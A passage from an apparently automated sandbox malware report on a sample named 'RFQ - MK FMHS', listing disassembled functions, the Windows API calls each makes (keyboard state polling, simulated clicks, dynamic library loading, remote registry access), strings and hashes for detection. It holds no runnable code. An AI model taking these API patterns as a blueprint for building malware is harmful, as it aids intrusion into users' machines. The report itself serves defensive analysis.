                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: BuffCharLower_memmove
                    • String ID: cdecl$none$stdcall$winapi
                    • API String ID: 3425801089-567219261
                    • Opcode ID: 0442d7a15c68bc48f6dfd158354435d5903702cef207ec1620cd0b4b82be1fe0
                    • Instruction ID: f844adc26d13edb117d6cd6b25ae84f7768fcf80bf876e8cc0c4d7d0433459d4
                    • Opcode Fuzzy Hash: 0442d7a15c68bc48f6dfd158354435d5903702cef207ec1620cd0b4b82be1fe0
                    • Instruction Fuzzy Hash: F531A471504619AFCF10EF55CC819EEB3F4FF05314B11962AE869B76D1DB71A905CB80
                    Function 00EC9372 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E77F41: _memmove.LIBCMT ref: 00E77F82
                      • Part of subcall function 00ECB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00ECB0E7
                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00EC93F6
                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00EC9409
                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 00EC9439
                      • Part of subcall function 00E77D2C: _memmove.LIBCMT ref: 00E77D66
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: MessageSend$_memmove$ClassName
                    • String ID: ComboBox$ListBox
                    • API String ID: 365058703-1403004172
                    • Opcode ID: 7d4672f1a4c6b411dd2e328eb8aad429dd81fe38eafe5accbf83b76f25aeab7c
                    • Instruction ID: e1232e528ab20294ac912f9efb6be6702055cb9af18dacfd20e8cdd51868173f
                    • Opcode Fuzzy Hash: 7d4672f1a4c6b411dd2e328eb8aad429dd81fe38eafe5accbf83b76f25aeab7c
                    • Instruction Fuzzy Hash: 25210671A00104AEDB18AB74DC8ADFFB7B8EF45350B10912DF925B71E1DB364A0BD610
                    Function 00EF6656 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E71D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E71D73
                      • Part of subcall function 00E71D35: GetStockObject.GDI32(00000011), ref: 00E71D87
                      • Part of subcall function 00E71D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E71D91
                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00EF66D0
                    • LoadLibraryW.KERNEL32(?), ref: 00EF66D7
                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00EF66EC
                    • DestroyWindow.USER32(?), ref: 00EF66F4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                    • String ID: SysAnimate32
                    • API String ID: 4146253029-1011021900
                    • Opcode ID: fa54d57b6013bcdf15b31d24022b3a3f70ea1c12b4999cf4d46929fee64c2565
                    • Instruction ID: 2e2434f7fe9378bd962ddbb880cb08cafd21037ba5bc81826f5029dbd673cd9b
                    • Opcode Fuzzy Hash: fa54d57b6013bcdf15b31d24022b3a3f70ea1c12b4999cf4d46929fee64c2565
                    • Instruction Fuzzy Hash: 8D215B7120020ABFEF105F64EC80EBB77ADEF99368F116629FA11E6190DB71DC51A760
                    Function 00ED703E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                    Download Yara Rule
                    APIs
                    • GetStdHandle.KERNEL32(0000000C), ref: 00ED705E
                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00ED7091
                    • GetStdHandle.KERNEL32(0000000C), ref: 00ED70A3
                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00ED70DD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: CreateHandle$FilePipe
                    • String ID: nul
                    • API String ID: 4209266947-2873401336
                    • Opcode ID: f50095a67ab2ef856260b56346d2be038577d7040f5b3a3843e3cfb3ea63f7cf
                    • Instruction ID: 35f5873eefe12a8ce9462e3945def6877e938b22488134469b5545f995afaaef
                    • Opcode Fuzzy Hash: f50095a67ab2ef856260b56346d2be038577d7040f5b3a3843e3cfb3ea63f7cf
                    • Instruction Fuzzy Hash: 63218174604209ABDF209F29DC05AAA77E8EF44724F205A1AFDE0E73D0E7709852CB50
                    Function 00ED710C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                    Download Yara Rule
                    APIs
                    • GetStdHandle.KERNEL32(000000F6), ref: 00ED712B
                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00ED715D
                    • GetStdHandle.KERNEL32(000000F6), ref: 00ED716E
                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00ED71A8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: CreateHandle$FilePipe
                    • String ID: nul
                    • API String ID: 4209266947-2873401336
                    • Opcode ID: 26fdcb69780b0d66066095f602653a150184c4abda9b778724bc3b2cee7f385b
                    • Instruction ID: a1bc860f726371eebc923e9590a0bf2e7f56816f5ef5f3abed715404dc3e6ef8
                    • Opcode Fuzzy Hash: 26fdcb69780b0d66066095f602653a150184c4abda9b778724bc3b2cee7f385b
                    • Instruction Fuzzy Hash: EE21A175605206ABDB209F699C04AAAB7E8EF55724F201B1AFCF0F73D0E7709842CB51
                    Function 00EDAEAB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                    Download Yara Rule
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 00EDAEBF
                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00EDAF13
                    • __swprintf.LIBCMT ref: 00EDAF2C
                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,00EFF910), ref: 00EDAF6A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ErrorMode$InformationVolume__swprintf
                    • String ID: %lu
                    • API String ID: 3164766367-685833217
                    • Opcode ID: fa9d41d08043ed3e902302bd35f918d1fb795d9a5683c641b631c3d91f4a16dd
                    • Instruction ID: a940ed22884414dbe638867ab3cc282b9d87032ba83ca842bf5a8700abc948e7
                    • Opcode Fuzzy Hash: fa9d41d08043ed3e902302bd35f918d1fb795d9a5683c641b631c3d91f4a16dd
                    • Instruction Fuzzy Hash: 62216030A00209AFCB10DB65C985DAE7BF8EF89704B0040A9F909BB352DB71EA45CB21
                    Function 00ECA52F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E77D2C: _memmove.LIBCMT ref: 00E77D66
                      • Part of subcall function 00ECA37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00ECA399
                      • Part of subcall function 00ECA37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00ECA3AC
                      • Part of subcall function 00ECA37C: GetCurrentThreadId.KERNEL32 ref: 00ECA3B3
                      • Part of subcall function 00ECA37C: AttachThreadInput.USER32(00000000), ref: 00ECA3BA
                    • GetFocus.USER32 ref: 00ECA554
                      • Part of subcall function 00ECA3C5: GetParent.USER32(?), ref: 00ECA3D3
                    • GetClassNameW.USER32(?,?,00000100), ref: 00ECA59D
                    • EnumChildWindows.USER32(?,00ECA615), ref: 00ECA5C5
                    • __swprintf.LIBCMT ref: 00ECA5DF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                    • String ID: %s%d
                    • API String ID: 1941087503-1110647743
                    • Opcode ID: 9835eb746e14c0b5dda6ad3e0257121eb3fdede667ae20a42624517c5c90ce05
                    • Instruction ID: 2539261973b604c3c07a198cd5eb4d2d28b6854a08052351e9e8f2f095062ece
                    • Opcode Fuzzy Hash: 9835eb746e14c0b5dda6ad3e0257121eb3fdede667ae20a42624517c5c90ce05
                    • Instruction Fuzzy Hash: 2011A271600308ABDF107F64DD85FFE77B8AF89708F085079FA18BA192CA7159468B75
                    Function 00ED2017 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                    Download Yara Rule
                    APIs
                    • CharUpperBuffW.USER32(?,?), ref: 00ED2048
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: BuffCharUpper
                    • String ID: APPEND$EXISTS$KEYS$REMOVE
                    • API String ID: 3964851224-769500911
                    • Opcode ID: 5ad3e84db72aca3724afad43101c8853a80c47373795825e64487dc25cba4ecc
                    • Instruction ID: 6dd0eb3e0c391d54921a5284d4cc747cff82acdf8c8e39af85dd59e5c43aa51d
                    • Opcode Fuzzy Hash: 5ad3e84db72aca3724afad43101c8853a80c47373795825e64487dc25cba4ecc
                    • Instruction Fuzzy Hash: 03115B309001198FCF00EFA4D9514EEB7F4FF25304B54986AD855B7352EB32691BDB51
                    Function 00EEEE69 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                    Download Yara Rule
                    APIs
                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00EEEF1B
                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00EEEF4B
                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00EEF07E
                    • CloseHandle.KERNEL32(?), ref: 00EEF0FF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                    • String ID:
                    • API String ID: 2364364464-0
                    • Opcode ID: fd0ef77ab41558197d9d8e812702051e9d0c187f96c1750732f2ad0e959bd769
                    • Instruction ID: b027f8f48297d5290bbbe286d2046331c4377c6e08bba0da3700ea6b5767d13a
                    • Opcode Fuzzy Hash: fd0ef77ab41558197d9d8e812702051e9d0c187f96c1750732f2ad0e959bd769
                    • Instruction Fuzzy Hash: 92814E716043019FD720DF29C886B6AB7E5EF88720F14982DF999EB292DB70AD40CB51
                    Function 00EF02C2 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E77F41: _memmove.LIBCMT ref: 00E77F82
                      • Part of subcall function 00EF10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EF0038,?,?), ref: 00EF10BC
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EF0388
                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EF03C7
                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00EF040E
                    • RegCloseKey.ADVAPI32(?,?), ref: 00EF043A
                    • RegCloseKey.ADVAPI32(00000000), ref: 00EF0447
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                    • String ID:
                    • API String ID: 3440857362-0
                    • Opcode ID: 01166f9403db662667c5981eaea521350cd8fae8b3c4accdcb84c8233df7cd75
                    • Instruction ID: 2e489be1ed560afb63f989b34fb2d33b24280af48785290845fbafc3ca5d242d
                    • Opcode Fuzzy Hash: 01166f9403db662667c5981eaea521350cd8fae8b3c4accdcb84c8233df7cd75
                    • Instruction Fuzzy Hash: 8E513A31208204AFD704EF64C881E7EB7E9FF84314F44992EF699A7292DB31E905CB52
                    Function 00EEDBDC Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E79997: __itow.LIBCMT ref: 00E799C2
                      • Part of subcall function 00E79997: __swprintf.LIBCMT ref: 00E79A0C
                    • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00EEDC3B
                    • GetProcAddress.KERNEL32(00000000,?), ref: 00EEDCBE
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00EEDCDA
                    • GetProcAddress.KERNEL32(00000000,?), ref: 00EEDD1B
                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00EEDD35
                      • Part of subcall function 00E75B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00ED7B20,?,?,00000000), ref: 00E75B8C
                      • Part of subcall function 00E75B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00ED7B20,?,?,00000000,?,?), ref: 00E75BB0
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                    • String ID:
                    • API String ID: 327935632-0
                    • Opcode ID: 31c582489ac004ffe01f80810d241de14ba649f5c3be54e127aa2e62211538c4
                    • Instruction ID: 4467aa36dab96b5c9670e3df1d6c27908c97f22bc703f4075831882c03728512
                    • Opcode Fuzzy Hash: 31c582489ac004ffe01f80810d241de14ba649f5c3be54e127aa2e62211538c4
                    • Instruction Fuzzy Hash: CD512435A042099FCB01EFA9C8849ADF7F4EF48324B15D069E819AB362DB70AD45CF91
                    Function 00EDE7DC Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                    Download Yara Rule
                    APIs
                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00EDE88A
                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00EDE8B3
                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00EDE8F2
                      • Part of subcall function 00E79997: __itow.LIBCMT ref: 00E799C2
                      • Part of subcall function 00E79997: __swprintf.LIBCMT ref: 00E79A0C
                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00EDE917
                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00EDE91F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                    • String ID:
                    • API String ID: 1389676194-0
                    • Opcode ID: 938f5561ba6811d252f69a94c78cf10e0b43a62d487d5c0513867f9d6445507f
                    • Instruction ID: 0b723947f190294ab5952262815eb5ea3d16a2eefa4fbea8ec9b57d549e9f96b
                    • Opcode Fuzzy Hash: 938f5561ba6811d252f69a94c78cf10e0b43a62d487d5c0513867f9d6445507f
                    • Instruction Fuzzy Hash: 45512835A00205EFDF05EF64C985AAEBBF5EF48314B1490A9E909BB362DB31ED11DB50
                    Function 00EFA2C5 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 20977170fd56c3f0b837bb3b887c41ffa8b4c39a9afa652b6fce8f1ceda7eda3
                    • Instruction ID: 49c0d6bbcf9801b128074110ab43017e9f191c9809a43c162c3c2f4ed4046a0e
                    • Opcode Fuzzy Hash: 20977170fd56c3f0b837bb3b887c41ffa8b4c39a9afa652b6fce8f1ceda7eda3
                    • Instruction Fuzzy Hash: F541E3B590110CAFC710DB28CC44FBDBBA5EB09314F195175EA29BB2E1D770AD41DA51
                    Function 00E72344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                    Download Yara Rule
                    APIs
                    • GetCursorPos.USER32(?), ref: 00E72357
                    • ScreenToClient.USER32(00F367B0,?), ref: 00E72374
                    • GetAsyncKeyState.USER32(00000001), ref: 00E72399
                    • GetAsyncKeyState.USER32(00000002), ref: 00E723A7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: AsyncState$ClientCursorScreen
                    • String ID:
                    • API String ID: 4210589936-0
                    • Opcode ID: f407f62b85a6bb5e9ff1469fbb17af99e70a7d79bacd41426f36a203f1ef9888
                    • Instruction ID: ba190f1c86b2fa13795951724431315d7e0e365961b8672004555c489c71b461
                    • Opcode Fuzzy Hash: f407f62b85a6bb5e9ff1469fbb17af99e70a7d79bacd41426f36a203f1ef9888
                    • Instruction Fuzzy Hash: D041813590411AFFDF159F68CC44AE9BBB4FF49324F20931AF928B62A0C7346954DBA1
                    Function 00EC6920 Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                    Download Yara Rule
                    APIs
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00EC695D
                    • TranslateAcceleratorW.USER32(?,?,?), ref: 00EC69A9
                    • TranslateMessage.USER32(?), ref: 00EC69D2
                    • DispatchMessageW.USER32(?), ref: 00EC69DC
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00EC69EB
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Message$PeekTranslate$AcceleratorDispatch
                    • String ID:
                    • API String ID: 2108273632-0
                    • Opcode ID: e3b67bde0318ff516db4abe8682371237469e63787b32fc6312d55e7c40ec1e0
                    • Instruction ID: dee1c91b7e5e54cb32c37cc3879af8a3252a0fa81c3856ac0bcdef0f773d4eb3
                    • Opcode Fuzzy Hash: e3b67bde0318ff516db4abe8682371237469e63787b32fc6312d55e7c40ec1e0
                    • Instruction Fuzzy Hash: 2A31C531504246AEDB20CF75CD44FB77BA9AF45318F10916DE421E21A1DB36D88BE7A0
                    Function 00EC8F01 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                    Download Yara Rule
                    APIs
                    • GetWindowRect.USER32(?,?), ref: 00EC8F12
                    • PostMessageW.USER32(?,00000201,00000001), ref: 00EC8FBC
                    • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00EC8FC4
                    • PostMessageW.USER32(?,00000202,00000000), ref: 00EC8FD2
                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00EC8FDA
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: MessagePostSleep$RectWindow
                    • String ID:
                    • API String ID: 3382505437-0
